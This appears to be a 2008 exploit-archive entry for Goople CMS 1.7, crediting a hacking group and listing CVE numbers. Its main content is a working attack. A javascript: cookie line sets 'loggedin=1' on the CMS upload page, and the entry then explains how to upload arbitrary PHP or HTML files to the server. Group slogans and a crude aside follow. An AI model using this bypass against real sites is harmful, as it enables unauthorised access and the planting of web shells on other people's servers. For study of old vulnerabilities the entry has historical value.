Goople CMS 1.7 - Insecure Cookie Handling



EKU-ID: 15060 CVE: OSVDB-50267;CVE-2008-6119;OSVDB-50266;CVE-2008-6118 OSVDB-ID:
Author: BeyazKurt Published: 2008-11-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
#
# Exploit :
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                       Rinia ShqiptaRe  :)
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#######################################################

# milw0rm.com [2008-11-23]